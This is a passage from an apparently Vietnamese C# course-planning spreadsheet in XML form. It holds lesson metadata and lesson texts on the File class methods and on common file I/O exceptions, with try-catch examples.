Sau khi chép, tệp nguồn vẫn còn nguyên. Bạn có hai bản.
## Move: chuyển tệp hoặc đổi tên
`File.Move(nguon, dich)` đưa tệp sang vị trí mới. Khác với `Copy`, tệp **không còn** ở chỗ cũ. Vì "đổi tên" thực chất là "chuyển sang tên mới", `Move` cũng dùng để đổi tên tệp.
```csharp
File.Move("a.txt", Path.Combine("Backup", "a.txt"));                // chuyển a.txt vào Backup
File.Move(Path.Combine("Backup", "a.txt"), Path.Combine("Backup", "c.txt"));   // cùng thư mục, tên mới: đổi tên
```
Thư mục đích (ở đây là `Backup`) phải có sẵn. Nếu tệp đích đã tồn tại, `Move` cũng ném `IOException`.
## Delete: xóa tệp
`File.Delete(path)` xóa tệp vĩnh viễn, **không** đưa vào Thùng rác. Hành vi khi tệp không có hơi đặc biệt:
| Tình huống | Kết quả |
|---|---|
| Thư mục có thật, nhưng tệp không có | Bỏ qua âm thầm, **không lỗi** |
| Thư mục chứa tệp cũng không có | Ném `DirectoryNotFoundException` |
```csharp
File.Delete("z.txt");   // z.txt không có, nhưng thư mục chạy có thật: không lỗi
try
{
    File.Delete(Path.Combine("KhongCo", "z.txt"));   // thư mục KhongCo không có
}
catch (DirectoryNotFoundException)
{
    Console.WriteLine("Thiếu thư mục");
}
```
## Hoạt động: Bốn phương thức tác động lên tệp
Mô phỏng dưới đây có một cây thư mục gồm `a.txt`, `b.txt` và thư mục `Backup`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Exists**. `File.Exists("a.txt")` thấy tệp nên in `True`. Với `File.Exists("z.txt")`, một dòng `z.txt` mờ "không có" xuất hiện và chương trình in `False`, không có lỗi.
- Mở tab **Copy**. Chép `a.txt` sang `b.txt` khi `b.txt` đã có: `b.txt` đỏ lên cùng thẻ `IOException`, `catch` in "b.txt đã có" và hai tệp vẫn như cũ. Sau đó `File.Copy("a.txt", "b.txt", overwrite: true)` ghi đè, `b.txt` chuyển màu xanh với chú thích "đã bị ghi đè".
- Mở tab **Move**. `File.Move("a.txt", @"Backup\a.txt")` làm `a.txt` ở thư mục chạy bị đánh dấu xóa và một `a.txt` mới màu xanh xuất hiện trong `Backup`. Tiếp theo, chuyển `Backup\a.txt` sang `Backup\c.txt` (cùng thư mục, tên mới) là đổi tên, và `Backup` chỉ còn `c.txt`.
- Mở tab **Delete**. `File.Delete("z.txt")` bị bỏ qua và thẻ "Không có lỗi" hiện ra. Với `File.Delete(@"KhongCo\z.txt")`, thư mục `KhongCo` cũng không có nên thẻ đỏ `DirectoryNotFoundException` xuất hiện, `catch` in "Thiếu thư mục". Cây thư mục không đổi sau cả hai lần xóa.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/quan-ly-duong-dan-va-thu-muc/cac-phuong-thuc-huu-ich-cua-lop-file/" title="Các phương thức của lớp File" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `Exists` chỉ hỏi chứ không đổi gì. `Copy` không ghi đè theo mặc định, phải truyền `overwrite: true`. `Move` vừa chuyển vừa đổi tên. `Delete` bỏ qua tệp vắng mặt, nhưng lỗi nếu thư mục chứa nó không có.
## Ghi và đọc nhanh bằng lớp File
Với tệp văn bản nhỏ hoặc vừa, lớp `File` còn có các phương thức "một lệnh là xong":
| Phương thức | Việc làm |
|---|---|
| `File.WriteAllText(path, text)` | Ghi cả chuỗi vào tệp. Tệp đã có thì **bị ghi đè hoàn toàn** |
| `File.AppendAllText(path, text)` | Thêm vào cuối tệp, giữ dữ liệu cũ |
| `File.ReadAllText(path)` | Đọc cả tệp thành một chuỗi |
| `File.ReadAllLines(path)` | Đọc cả tệp thành mảng, mỗi phần tử một dòng |
```csharp
File.WriteAllText("log.txt", "Bắt đầu ghi nhật ký.\n");
File.AppendAllText("log.txt", "Hệ thống hoạt động bình thường.");
Console.WriteLine(File.ReadAllText("log.txt"));
```
## Những điều cần cẩn thận
- Các phương thức `ReadAll...` nạp **toàn bộ** tệp vào bộ nhớ. Với tệp rất lớn (vài GB), hãy đọc từng dòng bằng `StreamReader`.
- Nếu tệp đang được chương trình khác mở, thao tác có thể ném `IOException`. Nếu không đủ quyền, sẽ là `UnauthorizedAccessException`. Hãy bọc các lệnh quan trọng trong `try-catch`.
- `Delete` và `Copy` với `overwrite: true` đều làm mất dữ liệu cũ, nên cần chắc chắn trước khi gọi.
## Tóm tắt
- `File` là lớp tĩnh trong `System.IO`, thao tác trực tiếp với tệp.
- `Exists` trả về `true` hoặc `false`, không ném lỗi.
- `Copy` không ghi đè theo mặc định. Truyền `overwrite: true` khi muốn ghi đè.
- `Move` chuyển tệp sang chỗ mới và cũng dùng để đổi tên.
- `Delete` bỏ qua tệp không có, nhưng ném `DirectoryNotFoundException` nếu thư mục chứa nó không có.</t>
        </is>
      </c>
    </row>
    <row r="43" ht="409.6" customHeight="1" s="18">
      <c r="A43" s="10" t="n">
        <v>43</v>
      </c>
      <c r="B43" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C43" s="10" t="inlineStr">
        <is>
          <t>Xử lý Lỗi và Tài nguyên trong File I/O</t>
        </is>
      </c>
      <c r="D43" s="10" t="inlineStr">
        <is>
          <t>Các loại ngoại lệ phổ biến trong File I/O</t>
        </is>
      </c>
      <c r="E43" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F43" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G43" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H43" s="10" t="inlineStr">
        <is>
          <t>Nhận ra exception nào xảy ra ở tình huống tệp/thư mục nào, và quan hệ giữa chúng.</t>
        </is>
      </c>
      <c r="I43" s="10" t="inlineStr">
        <is>
          <t>1 cột, 4 tab</t>
        </is>
      </c>
      <c r="J43" s="10" t="inlineStr">
        <is>
          <t>Cây thư mục đánh dấu vị trí gây lỗi (nút đỏ; ổ khóa cho tệp không có quyền hoặc đang bị dùng). Thẻ exception kèm cách xử lý. Bước cuối: cây phân cấp nhỏ IOException → FileNotFoundException, DirectoryNotFoundException.</t>
        </is>
      </c>
      <c r="K43" s="10" t="inlineStr">
        <is>
          <t>H15, H03, H06</t>
        </is>
      </c>
      <c r="L43" s="10" t="inlineStr">
        <is>
          <t>FileNotFoundException | DirectoryNotFoundException | UnauthorizedAccessException | IOException (tệp đang được dùng)</t>
        </is>
      </c>
      <c r="M43" s="10" t="inlineStr">
        <is>
          <t>FileNotFound: đọc data.txt không tồn tại.
DirectoryNotFound: ghi vào KhongCo\a.txt khi thư mục KhongCo không tồn tại.
UnauthorizedAccess: ghi vào tệp chỉ đọc hoặc thư mục hệ thống.
IOException: tệp đang được chương trình khác mở để ghi.
Bước cuối: catch (IOException) bắt được cả FileNotFound và DirectoryNotFound; UnauthorizedAccessException không phải IOException nên cần catch riêng.</t>
        </is>
      </c>
      <c r="N43" s="10" t="inlineStr">
        <is>
          <t>Tình huống cố định</t>
        </is>
      </c>
      <c r="O43" s="10" t="inlineStr">
        <is>
          <t>Bắt cụ thể trước, IOException sau; nhớ UnauthorizedAccessException là nhánh riêng.</t>
        </is>
      </c>
      <c r="P43" s="10" t="inlineStr">
        <is>
          <t>FileNotFoundException, DirectoryNotFoundException kế thừa IOException; UnauthorizedAccessException kế thừa SystemException. Tình huống tệp bị khóa thấy rõ trên Windows.</t>
        </is>
      </c>
      <c r="Q43" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/xu-ly-loi-va-tai-nguyen-trong-file-i-o/cac-loai-ngoai-le-pho-bien-trong-file-i-o/index.html</t>
        </is>
      </c>
      <c r="R43" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/xu-ly-loi-va-tai-nguyen-trong-file-i-o/cac-loai-ngoai-le-pho-bien-trong-file-i-o/</t>
        </is>
      </c>
      <c r="S43" s="10" t="n"/>
      <c r="T43" s="12" t="n"/>
      <c r="U43" s="12" t="n"/>
      <c r="V43" s="21" t="inlineStr">
        <is>
          <t>Giới thiệu về Ngoại lệ trong File I/O
Trong quá trình phát triển ứng dụng, việc tương tác với hệ thống file (File Input/Output - I/O) là một tác vụ rất phổ biến. Từ việc đọc cấu hình từ một file, lưu trữ dữ liệu người dùng, cho đến ghi log hoạt động, mọi thứ đều yêu cầu chương trình của bạn có khả năng đọc và ghi file văn bản. Tuy nhiên, các thao tác này không phải lúc nào cũng diễn ra suôn sẻ. Có rất nhiều yếu tố bên ngoài có thể khiến một thao tác file thất bại, dẫn đến các tình huống lỗi mà chúng ta gọi là ngoại lệ (exceptions).
Ngoại lệ trong File I/O xảy ra khi chương trình cố gắng thực hiện một hành động không hợp lệ hoặc không thể thực hiện được đối với một file hoặc thư mục. Ví dụ, bạn có thể cố gắng đọc một file không tồn tại, ghi vào một thư mục không có quyền truy cập, hoặc thao tác với một file đang bị ứng dụng khác khóa. Việc hiểu rõ các loại ngoại lệ phổ biến này là cực kỳ quan trọng. Nó giúp bạn không chỉ dự đoán được các vấn đề tiềm ẩn mà còn thiết kế các cơ chế xử lý lỗi mạnh mẽ, đảm bảo ứng dụng của bạn luôn ổn định và cung cấp trải nghiệm tốt cho người dùng, thay vì bị crash đột ngột.
Trong trang này, chúng ta sẽ tìm hiểu về các loại ngoại lệ thường gặp nhất khi làm việc với File I/O trong C#, nguyên nhân gây ra chúng và cách nhận biết.
FileNotFoundException
FileNotFoundException là một trong những ngoại lệ phổ biến nhất và dễ nhận biết nhất trong File I/O.
Nguyên nhân: Ngoại lệ này xảy ra khi chương trình cố gắng truy cập một file tại một đường dẫn cụ thể, nhưng file đó không tồn tại.
Cách nhận biết: Thông báo lỗi thường rất rõ ràng, cho biết "Could not find file 'đường_dẫn_file'".
Ví dụ:
Bạn cố gắng đọc một file cấu hình settings.txt nhưng file này đã bị xóa hoặc chưa bao giờ được tạo ra.
Đường dẫn file bị gõ sai chính tả.
File tồn tại nhưng chương trình không có quyền truy cập vào thư mục chứa file đó (mặc dù trường hợp này có thể gây ra UnauthorizedAccessException trước).
string filePath = "duong_dan_khong_ton_tai/file_cua_toi.txt";
try
{
    string content = File.ReadAllText(filePath);
    Console.WriteLine(content);
}
catch (FileNotFoundException ex)
{
    Console.WriteLine($"Lỗi: Không tìm thấy file tại '{filePath}'. Chi tiết: {ex.Message}");
    // Chương trình có thể yêu cầu người dùng nhập lại đường dẫn hoặc tạo file mặc định.
}
DirectoryNotFoundException
Tương tự như FileNotFoundException, DirectoryNotFoundException liên quan đến sự tồn tại của thư mục.
Nguyên nhân: Ngoại lệ này xảy ra khi chương trình cố gắng truy cập một thư mục tại một đường dẫn cụ thể, nhưng thư mục đó không tồn tại. Điều này thường xảy ra khi bạn cố gắng tạo một file trong một thư mục chưa tồn tại hoặc liệt kê nội dung của một thư mục đã bị xóa.
Cách nhận biết: Thông báo lỗi sẽ chỉ ra rằng "Could not find a part of the path 'đường_dẫn_thư_mục'".
Ví dụ:
Bạn cố gắng ghi dữ liệu vào file log.txt trong thư mục C:\Logs\Daily\, nhưng thư mục Daily hoặc Logs chưa được tạo.
Bạn cố gắng liệt kê các file trong một thư mục đã bị xóa.
string directoryPath = "C:\\ThuMucKhongTonTai\\SubFolder";
string filePath = Path.Combine(directoryPath, "data.txt"); // Cố gắng tạo file trong thư mục không tồn tại
try
{
    // Để ví dụ, ta sẽ thử ghi một file vào thư mục này
    // Dù File.WriteAllText có thể tự tạo thư mục cha nếu không tồn tại,
    // nhưng nếu bạn sử dụng các phương thức khác hoặc kiểm tra sự tồn tại của thư mục trước đó,
    // ngoại lệ này có thể xảy ra.
    // Giả sử ở đây ta đang cố gắng truy cập thư mục trực tiếp.
    Directory.GetFiles(directoryPath); // Sẽ gây ra ngoại lệ nếu thư mục không tồn tại
}
catch (DirectoryNotFoundException ex)
{
    Console.WriteLine($"Lỗi: Không tìm thấy thư mục tại '{directoryPath}'. Chi tiết: {ex.Message}");
    // Chương trình có thể tạo thư mục nếu cần: Directory.CreateDirectory(directoryPath);
}
UnauthorizedAccessException
Ngoại lệ này liên quan đến quyền truy cập vào file hoặc thư mục.
Nguyên nhân: Xảy ra khi chương trình không có các quyền cần thiết để thực hiện thao tác được yêu cầu (đọc, ghi, xóa) trên một file hoặc thư mục. Các nguyên nhân phổ biến bao gồm:
File hoặc thư mục được đánh dấu là chỉ đọc (read-only).
Chương trình không có quyền đọc/ghi theo cài đặt bảo mật của hệ điều hành.
File đang bị một tiến trình khác khóa và chương trình không thể truy cập độc quyền.
Cách nhận biết: Thông báo lỗi thường là "Access to the path 'đường_dẫn' is denied." hoặc "The process cannot access the file 'đường_dẫn' because it is being used by another process."
Ví dụ:
Bạn cố gắng ghi dữ liệu vào một file hệ thống như C:\Windows\System32\drivers\etc\hosts mà không có quyền quản trị.
Một ứng dụng khác (ví dụ: trình duyệt web tải xuống) đang mở một file và bạn cố gắng xóa file đó.
string protectedFilePath = "C:\\Windows\\System32\\config.ini"; // Ví dụ một file hệ thống
try
{
    File.WriteAllText(protectedFilePath, "Thử ghi dữ liệu");
}
catch (UnauthorizedAccessException ex)
{
    Console.WriteLine($"Lỗi: Không có quyền truy cập vào file '{protectedFilePath}'. Chi tiết: {ex.Message}");
    // Chương trình có thể thông báo cho người dùng về vấn đề quyền hạn.
}
IOException
IOException là một ngoại lệ chung, đóng vai trò là lớp cơ sở cho nhiều ngoại lệ I/O khác, nhưng nó cũng được ném ra cho các lỗi I/O tổng quát không thuộc về các loại cụ thể hơn.
Nguyên nhân: Bao gồm một loạt các vấn đề I/O khác nhau, chẳng hạn như:
Đĩa đầy.
Thiết bị I/O bị lỗi (ví dụ: ổ USB bị rút ra khi đang thao tác).
Lỗi mạng khi truy cập file trên chia sẻ mạng.
File đang bị khóa bởi một tiến trình khác (mặc dù đôi khi cũng có thể là UnauthorizedAccessException).
Cách nhận biết: Thông báo lỗi có thể đa dạng tùy thuộc vào nguyên nhân cụ thể, nhưng thường sẽ chỉ ra một vấn đề tổng quát khi thực hiện thao tác I/O.
Ví dụ:
Bạn đang cố gắng ghi một file lớn nhưng ổ đĩa đã hết dung lượng.
Bạn đang đọc file từ một ổ đĩa mạng và kết nối mạng bị mất.
string largeFilePath = "D:\\output_large_file.txt"; // Giả định ổ D: có thể đầy
try
{
    using (StreamWriter writer = new StreamWriter(largeFilePath))
    {
        for (int i = 0; i &lt; 10000000; i++) // Thử ghi rất nhiều dữ liệu
        {
            writer.WriteLine($"Dòng dữ liệu thứ {i}");
        }
    }
}
catch (IOException ex)
{
    Console.WriteLine($"Lỗi I/O tổng quát xảy ra. Chi tiết: {ex.Message}");
    // Kiểm tra các mã lỗi cụ thể (ví dụ: ex.HResult) để xác định nguyên nhân chính xác hơn
    // hoặc thông báo cho người dùng kiểm tra dung lượng ổ đĩa/kết nối mạng.
}
PathTooLongException
Ngoại lệ này liên quan đến độ dài của đường dẫn file hoặc thư mục.
Nguyên nhân: Xảy ra khi đường dẫn đầy đủ của file hoặc thư mục (bao gồm cả tên file) vượt quá giới hạn độ dài tối đa mà hệ điều hành cho phép. Trên Windows, giới hạn này thường là 260 ký tự (MAX_PATH).
Cách nhận biết: Thông báo lỗi sẽ rõ ràng chỉ ra "The specified path, file name, or both are too long. The fully qualified file name must be less than 260 characters, and the directory name must be less than 248 characters."
Ví dụ:
Bạn tạo một cấu trúc thư mục lồng nhau rất sâu và đặt một file có tên dài bên trong.
Đường dẫn đầy đủ: C:\MyProject\VeryLongFolderName1\AnotherExtremelyLongFolderName2\YetAnotherSuperLongFolderName3\AndOneMoreReallyLongFolderName4\FinallyTheFileWithAVeryLongNameIndeed.txt vượt quá 260 ký tự.
string veryLongPath = "C:\\" + new string('A', 50) + "\\" + new string('B', 50) + "\\" + new string('C', 50) + "\\" + new string('D', 50) + "\\very_long_filename_that_exceeds_limit.txt";
try
{
    File.WriteAllText(veryLongPath, "Nội dung");
}
catch (PathTooLongException ex)
{
    Console.WriteLine($"Lỗi: Đường dẫn quá dài. Chi tiết: {ex.Message}");
    // Chương trình có thể gợi ý người dùng rút ngắn đường dẫn hoặc tên file.
}
Tầm quan trọng của việc xử lý ngoại lệ để chương trình ổn định
Việc hiểu và nhận biết các loại ngoại lệ phổ biến trong File I/O là bước đầu tiên và quan trọng nhất để xây dựng các ứng dụng mạnh mẽ. Nếu chương trình của bạn không xử lý các ngoại lệ này một cách có kiểm soát, bất kỳ lỗi nào trong số chúng cũng có thể dẫn đến việc ứng dụng bị crash, mất dữ liệu hoặc hoạt động không mong muốn.
Khi bạn dự đoán được các lỗi có thể xảy ra, bạn có thể:
Ngăn chặn ứng dụng bị crash: Thay vì dừng đột ngột, chương trình có thể bắt ngoại lệ, thông báo cho người dùng và tiếp tục hoạt động.
Phục hồi lỗi một cách duyên dáng: Cung cấp thông báo lỗi thân thiện, gợi ý giải pháp (ví dụ: "Kiểm tra quyền truy cập" hoặc "Giải phóng dung lượng ổ đĩa"), hoặc thử lại thao tác sau một khoảng thời gian.
Ghi log lỗi: Ghi lại chi tiết ngoại lệ vào file log giúp bạn dễ dàng gỡ lỗi và cải thiện ứng dụng trong tương lai.
Đảm bảo tính toàn vẹn của dữ liệu: Trong một số trường hợp, việc không xử lý ngoại lệ có thể dẫn đến file bị hỏng hoặc dữ liệu bị mất.
Trong bài học tiếp theo, chúng ta sẽ đi sâu vào cách sử dụng khối try-catch-finally để bắt và xử lý các ngoại lệ này một cách hiệu quả, cũng như cách sử dụng câu lệnh using để quản lý tài nguyên file an toàn.</t>
        </is>
      </c>
      <c r="W43" s="22" t="inlineStr">
        <is>
          <t># Các loại ngoại lệ phổ biến trong File I/O
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích vì sao thao tác với tệp và thư mục có thể thất bại dù code đúng.
- Nhận ra `FileNotFoundException`, `DirectoryNotFoundException`, `UnauthorizedAccessException` và `IOException` ở từng tình huống cụ thể.
- Mô tả quan hệ kế thừa giữa các exception này.
- Viết khối `catch` đúng loại, đặt exception cụ thể trước `IOException`.
- Quan sát từng tình huống lỗi và vị trí của exception trong họ exception bằng hoạt động mô phỏng.
## Vì sao File I/O hay gặp lỗi
Tệp và thư mục thuộc về hệ điều hành, nằm ngoài sự kiểm soát của chương trình. Dù code đúng, thao tác vẫn có thể thất bại vì tệp bị xóa, đường dẫn sai, thiếu quyền hay tệp đang bận. Khi đó .NET ném một **ngoại lệ** (exception). Nếu không bắt, chương trình dừng đột ngột.
Biết lỗi nào xảy ra ở tình huống nào giúp bạn viết `catch` chính xác và thông báo lỗi dễ hiểu cho người dùng.
## Bốn exception thường gặp
### FileNotFoundException: tệp không có
Xảy ra khi đường dẫn trỏ tới tệp **không tồn tại** (đã bị xóa, chưa tạo, hoặc gõ sai tên). Thông điệp có dạng `Could not find file '...'`.
```csharp
try
{
    File.ReadAllText("data.txt");   // thư mục không có data.txt
}
catch (FileNotFoundException)
{
    Console.WriteLine("Không có data.txt");
}
```
Cách xử lý: kiểm tra bằng `File.Exists` trước, hoặc `catch` như trên.
### DirectoryNotFoundException: thư mục trong đường dẫn không có
Xảy ra khi **một thư mục** trong đường dẫn không tồn tại. Thông điệp có dạng `Could not find a part of the path '...'`. Tình huống hay gặp là ghi tệp vào thư mục chưa tạo, vì `File.WriteAllText` tạo được tệp nhưng **không tự tạo thư mục chứa nó**.
```csharp
try
{
    File.WriteAllText(@"KhongCo\a.txt", "xin chào");   // thư mục KhongCo chưa có
}
catch (DirectoryNotFoundException)
{
    Console.WriteLine("Không có thư mục");
}
```
Cách xử lý: gọi `Directory.CreateDirectory(...)` trước khi ghi.
### UnauthorizedAccessException: không đủ quyền
Xảy ra khi tệp **có tồn tại** nhưng hệ điều hành không cho phép thao tác, ví dụ ghi vào tệp chỉ đọc (read-only) hoặc vào vùng hệ thống. Thông điệp có dạng `Access to the path '...' is denied.`
```csharp
try
{
    File.WriteAllText("readonly.txt", "xin chào");   // tệp đang ở chế độ chỉ đọc
}
catch (UnauthorizedAccessException)
{
    Console.WriteLine("Không có quyền");
}
```
Cách xử lý: kiểm tra quyền hoặc báo người dùng.
### IOException: lỗi I/O chung, ví dụ tệp đang được dùng
`IOException` là exception chung cho các lỗi vào/ra: đĩa đầy, thiết bị bị rút, mất mạng, hoặc tệp đang bị chương trình khác giữ. Trường hợp tệp bận thường thấy trên Windows, với thông điệp `The process cannot access the file '...' because it is being used by another process.`
```csharp
try
{
    File.ReadAllText("log.txt");   // chương trình khác đang mở log.txt để ghi
}
catch (IOException)
{
    Console.WriteLine("Tệp đang bận");
}
```
Cách xử lý: thử lại sau hoặc báo người dùng.
## Quan hệ giữa các exception
```
Exception
└── SystemException
    ├── IOException
    │   ├── FileNotFoundException
    │   └── DirectoryNotFoundException
    └── UnauthorizedAccessException
```
Hai điểm quan trọng:
- `FileNotFoundException` và `DirectoryNotFoundException` đều là **con của `IOException`**. Vì vậy `catch (IOException)` cũng bắt được chúng.
- `UnauthorizedAccessException` **không phải con của `IOException`**. Nó nằm nhánh riêng, nên `catch (IOException)` sẽ bỏ lọt nó.
Do đó khi cần xử lý nhiều loại, hãy đặt `catch` **cụ thể trước, chung sau**:
```csharp
try
{
    File.WriteAllText(@"Data\a.txt", "xin chào");
}
catch (DirectoryNotFoundException)
{
    Console.WriteLine("Thiếu thư mục");
}
catch (UnauthorizedAccessException)
{
    Console.WriteLine("Không có quyền");
}
catch (IOException)
{
    Console.WriteLine("Lỗi vào/ra khác");
}
```
Nếu đặt `catch (IOException)` lên đầu, trình biên dịch báo lỗi, vì các `catch` cụ thể phía sau không bao giờ được chạy tới.
## Hoạt động: Mỗi tình huống một exception
Mô phỏng dưới đây có bốn tab, mỗi tab là một tình huống lỗi. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **FileNotFoundException**. Thư mục chỉ có `note.txt`, nhưng chương trình đọc `data.txt`. `data.txt` đỏ lên cùng thẻ lỗi `FileNotFoundException` và thông điệp "Could not find file". `catch` in "Không có data.txt". Bước cuối, hình họ exception sáng ở `FileNotFoundException`, con của `IOException`.
- Mở tab **DirectoryNotFoundException**. Chương trình ghi vào `KhongCo\a.txt` nhưng thư mục `KhongCo` chưa có. Thẻ lỗi `DirectoryNotFoundException` hiện ra, `catch` in "Không có thư mục". Hình họ exception sáng ở `DirectoryNotFoundException`, cũng là con của `IOException`.
- Mở tab **UnauthorizedAccessException**. Tệp `readonly.txt` có nhãn "khóa: chỉ đọc". Ghi vào nó gây thẻ lỗi `UnauthorizedAccessException`, `catch` in "Không có quyền". Ở bước cuối, bạn thấy nó nằm nhánh riêng, không phải con của `IOException`.
- Mở tab **IOException (tệp đang được dùng)**. `log.txt` có nhãn "khóa: đang được dùng". Đọc nó gây thẻ lỗi `IOException`, `catch` in "Tệp đang bận". Hình họ exception sáng ở `IOException`, lớp cha của hai exception "không tìm thấy".
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/xu-ly-loi-va-tai-nguyen-trong-file-i-o/cac-loai-ngoai-le-pho-bien-trong-file-i-o/" title="Các exception thường gặp trong File I/O" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: mỗi tình huống ứng với một exception riêng. Hai loại "không tìm thấy" là con của `IOException`, còn `UnauthorizedAccessException` đứng nhánh riêng. Nhờ vậy bạn bắt cụ thể trước, `IOException` sau, và không quên `UnauthorizedAccessException`.
## Vì sao cần xử lý các exception này
- **Không để chương trình dừng đột ngột:** bắt lỗi, báo người dùng rồi tiếp tục.
- **Thông báo thân thiện:** thay vì tên exception kỹ thuật, hãy nói "Không tìm thấy tệp, hãy kiểm tra đường dẫn".
- **Ghi nhật ký (log):** lưu chi tiết lỗi để dễ tìm nguyên nhân sau này.
- **Bảo vệ dữ liệu:** xử lý đúng giúp tránh tệp hỏng hoặc mất dữ liệu.
Ngoài bốn loại trên, bạn còn có thể gặp `PathTooLongException` (đường dẫn quá dài, cũng là con của `IOException`), nhưng ít khi gặp hơn.
## Tóm tắt
- Thao tác tệp có thể lỗi vì nguyên nhân bên ngoài chương trình, nên cần chuẩn bị `try-catch`.
- `FileNotFoundException`: tệp không có. `DirectoryNotFoundException`: thư mục trong đường dẫn không có.
- `UnauthorizedAccessException`: tệp có nhưng không đủ quyền thao tác.
- `IOException`: lỗi vào/ra chung, gồm cả tệp đang bị chương trình khác dùng.
- Hai exception "không tìm thấy" là con của `IOException`, còn `UnauthorizedAccessException` thì không.
- Đặt `catch` cụ thể trước, `catch (IOException)` sau.</t>
        </is>
      </c>
    </row>
    <row r="44" ht="409.6" customHeight="1" s="18">
      <c r="A44" s="10" t="n">
        <v>44</v>
      </c>
      <c r="B44" s="10" t="inlineStr">
        <is>
          <t>4. Đọc và Ghi File Văn bản</t>
        </is>
      </c>
      <c r="C44" s="10" t="inlineStr">
        <is>
          <t>Xử lý Lỗi và Tài nguyên trong File I/O</t>
        </is>
      </c>
      <c r="D44" s="10" t="inlineStr">
        <is>
          <t>Xử lý lỗi khi file không tồn tại</t>
        </is>
      </c>
      <c r="E44" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F44" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G44" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H44" s="10" t="inlineStr">
        <is>
          <t>So sánh hai cách: kiểm tra File.Exists trước và bắt FileNotFoundException.</t>
        </is>
      </c>
      <c r="I44" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Kiểm tra trước | Bắt exception</t>
        </is>
      </c>
      <c r="J44" s="10" t="inlineStr">
        <is>
          <t>Cây thư mục chung ở trên; đường đi code của mỗi cột tô theo tình huống.</t>
        </is>
      </c>
      <c r="K44" s="10" t="inlineStr">
        <is>
          <t>H15, H04</t>
        </is>
      </c>
      <c r="L44" s="10" t="inlineStr">
        <is>
          <t>Tệp có tồn tại | Tệp không tồn tại</t>
        </is>
      </c>
      <c r="M44" s="10" t="inlineStr">
        <is>
          <t>Tệp có: cả hai đọc được nội dung.
Tệp không có: trái File.Exists trả false → báo "Không tìm thấy tệp", không ném lỗi.
Phải: ReadAllText ném FileNotFoundException → catch báo cùng thông điệp.
Bước cuối: kiểm tra trước giúp code rõ ràng, nhưng vẫn nên có try-catch vì tệp có thể bị xóa ngay sau khi kiểm tra.</t>
        </is>
      </c>
      <c r="N44" s="10" t="inlineStr">
        <is>
          <t>data.txt</t>
        </is>
      </c>
      <c r="O44" s="10" t="inlineStr">
        <is>
          <t>Kết hợp cả hai: kiểm tra trước cho trường hợp thường gặp, try-catch cho trường hợp bất ngờ.</t>
        </is>
      </c>
      <c r="P44" s="10" t="n"/>
      <c r="Q44" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/doc-va-ghi-file-van-ban/xu-ly-loi-va-tai-nguyen-trong-file-i-o/xu-ly-loi-khi-file-khong-ton-tai/index.html</t>
        </is>
      </c>
      <c r="R44" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/doc-va-ghi-file-van-ban/xu-ly-loi-va-tai-nguyen-trong-file-i-o/xu-ly-loi-khi-file-khong-ton-tai/</t>
        </is>
      </c>
      <c r="S44" s="10" t="n"/>
      <c r="T44" s="12" t="n"/>
      <c r="U44" s="12" t="n"/>
      <c r="V44" s="21" t="inlineStr">
        <is>
          <t>Tại sao cần xử lý lỗi file không tồn tại?
Trong các ứng dụng thực tế, giả định rằng "file luôn tồn tại tại đường dẫn đã định" là một sai lầm phổ biến dẫn đến việc ứng dụng bị đột ngột dừng (crash). Hệ thống file là một tài nguyên bên ngoài (external resource) nằm ngoài tầm kiểm soát trực tiếp của ứng dụng của bạn. Người dùng có thể xóa file, di chuyển thư mục, hoặc đơn giản là bạn đã gõ sai đường dẫn trong code.
Khi chương trình cố gắng đọc một file không tồn tại thông qua các lớp như File.ReadAllText hay StreamReader, C# sẽ ném ra ngoại lệ FileNotFoundException (hoặc DirectoryNotFoundException nếu đường dẫn thư mục cha bị sai). Việc xử lý lỗi này không chỉ giúp chương trình "sống sót" mà còn mang lại trải nghiệm người dùng chuyên nghiệp hơn.
Kiểm tra sự tồn tại trước khi thao tác
Cách tiếp cận chủ động và an toàn nhất trước khi thực hiện bất kỳ thao tác đọc file nào là kiểm tra xem file đó có thực sự hiện diện trên đĩa cứng hay không. Lớp System.IO.File cung cấp phương thức tĩnh Exists cực kỳ hữu ích cho mục đích này.
using System;
using System.IO;
string path = "data.txt";
if (File.Exists(path))
{
    string content = File.ReadAllText(path);
    Console.WriteLine("Nội dung file: " + content);
}
else
{
    Console.WriteLine("Lỗi: Không tìm thấy file tại đường dẫn: " + path);
    // Tại đây bạn có thể yêu cầu người dùng chọn lại file hoặc tạo file mới
}
Việc sử dụng File.Exists giúp bạn kiểm soát luồng chương trình một cách logic mà không cần đợi ngoại lệ xảy ra. Điều này giúp code sạch hơn và hiệu suất cao hơn trong những trường hợp file thường xuyên bị thiếu.
Kết hợp kiểm tra và xử lý ngoại lệ
Mặc dù File.Exists rất tiện lợi, nhưng trong các hệ thống đa luồng hoặc ứng dụng có quyền truy cập phức tạp, trạng thái của file có thể thay đổi trong tích tắc giữa thời điểm bạn kiểm tra Exists và thời điểm bạn thực sự mở file (hiện tượng này gọi là Race Condition).
